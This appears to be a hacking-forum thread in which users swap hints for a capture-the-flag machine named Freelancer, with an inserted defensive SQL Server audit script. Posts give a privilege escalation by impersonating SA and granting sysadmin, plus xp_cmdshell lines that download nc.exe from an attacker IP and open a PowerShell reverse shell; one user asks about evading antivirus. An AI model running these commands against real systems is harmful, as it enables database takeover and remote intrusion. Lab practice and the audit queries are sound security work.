Posts: 24
Threads: 0
Joined: Apr 2024
(Jun 02, 2024, 03:19 AM)3thic4lh4ck3r Wrote: (Jun 02, 2024, 02:28 AM)maggi Wrote: any tip on the sql shell I still can't get it, it sucks but I found some useful commands
https://book.hacktricks.xyz/network-serv...sql-server
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\WINDOWS\system32> whoami
whoami
freelancer\sql_svc
what was the payload you used cuz i tried both and yet had no luck
Posts: 15
Threads: 0
Joined: May 2024
(Jun 02, 2024, 03:19 AM)3thic4lh4ck3r Wrote: (Jun 02, 2024, 02:28 AM)maggi Wrote: any tip on the sql shell I still can't get it, it sucks but I found some useful commands
https://book.hacktricks.xyz/network-serv...sql-server
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\WINDOWS\system32> whoami
whoami
freelancer\sql_svc
You are not able to run sp_configure 'show advanced options', '1' in SQL Terminal, because it says ('42000', '[42000] [Microsoft][ODBC Driver 17 for SQL Server][SQL Server]User does not have permission to perform this action. (15247) (SQLExecDirectW)')
Posts: 24
Threads: 0
Joined: Apr 2024
(Jun 02, 2024, 07:39 AM)hatteba Wrote: (Jun 02, 2024, 07:35 AM)3thic4lh4ck3r Wrote: Has anyone here got root yet? Stuck as mikasa with a .dmp file for quite some time now.
How did you manage to get reverse shell? u can PM to me...
hmu if you manage to get it
Posts: 134
Threads: 13
Joined: Sep 2023
was a fun box the dump was shitty though im curious how others did it
Posts: 24
Threads: 0
Joined: Apr 2024
(Jun 02, 2024, 07:44 AM)chillywilly Wrote: was a fun box the dump was shitty though im curious how others did it
how'd you do it hmu
Posts: 57
Threads: 1
Joined: Apr 2024
For those stuck in the SQL Terminal, you can impersonate SA
https://book.hacktricks.xyz/network-serv...ther-users
Use this to make yourself sysadmin, then you have the rights to enable adv options and the shell command.
EXECUTE AS LOGIN = 'SA'
EXEC sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin'
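A defender-side audit for the misconfiguration the post above relies on, as an added example that is not part of the original thread: it lists server-level IMPERSONATE grants, current sysadmin members and the xp_cmdshell setting. The login name in the commented remediation lines is a placeholder.

```sql
-- Added example (not from the thread). Run as a sysadmin on the instance under review.

-- 1. Which logins may impersonate which other logins?
--    A low-privileged grantee whose target is sa (or any sysadmin) is an
--    escalation path and should not exist for application logins.
SELECT grantee.name    AS grantee_login,
       target.name     AS can_impersonate,
       perm.state_desc AS grant_state,
       IS_SRVROLEMEMBER('sysadmin', target.name) AS target_is_sysadmin
FROM sys.server_permissions AS perm
JOIN sys.server_principals  AS grantee
  ON grantee.principal_id = perm.grantee_principal_id
JOIN sys.server_principals  AS target
  ON target.principal_id = perm.major_id
WHERE perm.class = 101                      -- SERVER_PRINCIPAL
  AND perm.permission_name = 'IMPERSONATE'
  AND perm.state IN ('G', 'W')              -- GRANT / GRANT WITH GRANT OPTION
ORDER BY target_is_sysadmin DESC, grantee.name;

-- 2. Current sysadmin members. An application login appearing here, or a
--    recent modify_date on one, deserves investigation.
SELECT m.name, m.type_desc, m.is_disabled, m.modify_date
FROM sys.server_role_members AS rm
JOIN sys.server_principals   AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals   AS m ON m.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin'
ORDER BY m.modify_date DESC;

-- 3. Is OS command execution enabled? value_in_use = 1 means it is active now.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'show advanced options');

-- 4. Remediation, to be adapted ([app_login_placeholder] is a placeholder name):
-- REVOKE IMPERSONATE ON LOGIN::[sa] FROM [app_login_placeholder];
-- ALTER SERVER ROLE [sysadmin] DROP MEMBER [app_login_placeholder];
-- Changing xp_cmdshell requires 'show advanced options' = 1 at the time:
-- EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
```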
Posts: 55
Threads: 4
Joined: Apr 2024
any hint for getting mikasa from sql_svc?
Posts: 15
Threads: 0
Joined: May 2024
wtf there was nc.exe previously but now it says 'nc.exe' is not recognized as an internal or external command,
Posts: 219
Threads: 14
Joined: Apr 2024
guys i'm stuck in sql terminal ?? can't get cmdshell
Posts: 57
Threads: 1
Joined: Apr 2024
(Jun 02, 2024, 09:07 AM)xss_02 Wrote: (Jun 02, 2024, 07:50 AM)ritualist Wrote: For those stuck in the SQL Terminal, you can impersonate SA
https://book.hacktricks.xyz/network-serv...ther-users
Use this to make yourself sysadmin, then you have the rights to enable adv options and the shell command.
EXECUTE AS LOGIN = 'SA'
EXEC sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin'
how to evade AV?
As mentioned previously, you can use nc
xp_cmdshell 'echo IWR http://10.10.X.X/nc.exe -OutFile %TEMP%\nc.exe | powershell -noprofile'
xp_cmdshell '%TEMP%\nc.exe 10.10.X.X 4242 -e powershell'
Can anyone share a hint on what to do after getting sql_svc shell? Tried BloodHound and some basic enumeration and pw spraying, but no success.